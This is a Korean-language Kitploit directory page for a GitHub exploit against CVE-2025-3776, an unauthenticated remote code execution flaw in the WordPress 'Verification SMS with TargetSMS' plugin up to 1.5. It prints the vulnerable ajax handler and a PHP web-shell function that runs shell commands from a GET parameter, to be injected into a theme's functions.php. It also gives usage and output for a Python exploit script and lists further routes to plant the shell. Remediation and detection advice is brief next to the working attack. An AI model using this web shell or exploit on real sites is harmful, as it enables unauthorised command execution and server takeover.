Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-3776 — WordPress Verification SMS with TargetSMS 플러그인 <= 1.5는 원격 코드 실행(RCE) 취약점이 있습니다. | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-3776
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-3776

CVE-2025-3776

WordPress Verification SMS with TargetSMS 플러그인 <= 1.5는 원격 코드 실행(RCE) 취약점이 있습니다.

저장소 보기
7111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-3776 - "Verification SMS with TargetSMS" 플러그인 1.5 이하에서의 원격 코드 실행

플러그인 정보

  • 플러그인 이름: Verification SMS with TargetSMS
  • 취약한 버전: <= 1.5
  • CVE ID: CVE-2025-3776
  • 유형: 원격 코드 실행 (RCE)
  • OWASP 분류: A1: 인젝션
  • CVSS 심각도: 10.0 (치명적)
  • 필요한 권한: 인증 불필요
  • 공개 날짜: 2025년 4월 23일

근본 원인: 프로그래밍 오류

이 취약점은 사용자 입력에 대해 허용된 함수 목록(화이트리스트)으로 검사하지 않고 call_user_func()를 사용하는 데서 비롯됩니다. 이로 인해 인증 없이 메모리에 있는 기존 PHP 함수를 실행할 수 있는 논리적 결함이 발생하여 심각한 원격 코드 실행(RCE) 조건이 만들어집니다.

취약한 코드 위치

파일: /inc/ajax.php

root@kitploit:~
add_action('wp_ajax_nopriv_targetvrHHndler', 'targetvr_ajax_handler');

function targetvr_ajax_handler(){
    $callback = targetvr_get_postData('callback', 'string');

    if ($callback and function_exists($callback)){
        call_user_func($callback);
    } else {
        targetvr_return_json(false);
    }

    wp_die();
}

이 코드는 인증되지 않은 사용자가 메모리에 존재하는 모든 함수를 트리거할 수 있도록 하며, 공격자가 함수를 로드할 수 있다면 악성 함수도 실행 가능합니다.


이 취약점 테스트 방법

✅ 전제 조건

이 취약점을 성공적으로 익스플로잇하려면 WordPress 환경에 호출 가능한 함수가 이미 존재해야 합니다. WordPress 플러그인과 테마는 함수를 자동 로드할 수 있으므로, 공격자는 활성 테마의 functions.php 파일을 통해 자신의 함수를 주입할 수 있습니다.

📍 수정할 파일:

root@kitploit:~
target.com/wp-content/themes/twentytwentyfour/functions.php

🛠️ functions.php 끝에 다음 페이로드를 주입합니다:

root@kitploit:~
function evil() {
    if (isset($_GET['cmd'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        echo '<pre>' . shell_exec("whoami") . '</pre>';
    }
    exit;
}

✅ 이렇게 하면 evil() 함수가 메모리에 로드되어 call_user_func()를 통해 실행 가능해집니다.


Python 스크립트를 이용한 익스플로잇 단계

✅ 사용법:

root@kitploit:~
python3 CVE-2025-3776.py -u http://target.com -c "id"

✅ 예시 출력:

root@kitploit:~
[*] Checking plugin version...
[+] Plugin version detected: 1.5
[+] Plugin is vulnerable. Proceeding with exploitation...
[*] Sending exploit request...
[+] Exploit succeeded!
<pre>uid=1(daemon) gid=1(daemon) groups=1(daemon)</pre>

Exploit By : Nxploited ( Khaled Alenazi )

Python 스크립트 도움말 메뉴:

root@kitploit:~
usage: CVE-2025-3776.py [-h] -u URL [-c CMD]

CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5

# Exploit by Nxploited ( Khaled Alenazi )

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target WordPress site URL
  -c, --cmd CMD  Command to execute (default: whoami)

주입이 없는 경우 동작

메모리에 evil() 함수나 유사한 함수가 없는 경우:

  • 요청은 다음 결과를 반환합니다:
root@kitploit:~
{"status":false}
  • 이는 콜백 함수가 존재하지 않음을 의미하며, 익스플로잇은 안전하게 실패합니다.

실제 익스플로잇 경로

  • 테마 파일 주입: 활성 테마의 functions.php 수정 (위에서 설명한 방식)
  • 파일 관리자 플러그인 이용: WP File Manager 같은 플러그인을 사용하여 evil() 함수가 포함된 PHP 파일 업로드
  • LFI 또는 include 결함 이용: 기존 로컬 파일 인클루션(LFI)을 사용하여 악성 함수가 포함된 업로드 파일을 포함

위험 및 영향

악성 함수가 로드되면 인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  • 임의의 셸 명령 실행
  • 민감한 서버 파일 열람
  • 사이트 또는 서버 전체 장악으로 이어지는 피벗

권장 사항

  • 버전 1.5 이하를 사용 중인 경우 즉시 플러그인 비활성화 또는 제거
  • wp-admin에서 파일 편집 접근 제한
  • 보안 대안으로 플러그인 패치 또는 교체

탐지

다음에 대한 반복적인 POST 요청을 모니터링하십시오:

root@kitploit:~
/wp-admin/admin-ajax.php?action=targetvrHHndler

callback=evil 또는 예상치 못한 함수 이름이 포함된 경우


법적 고지

이 정보는 교육 및 윤리적 연구 목적으로만 제공됩니다. 작성자는 이 정보의 사용으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.


익스플로잇 저자

익스플로잇 작성자: Nxploited (Khaled Alenazi)

도구 다운로드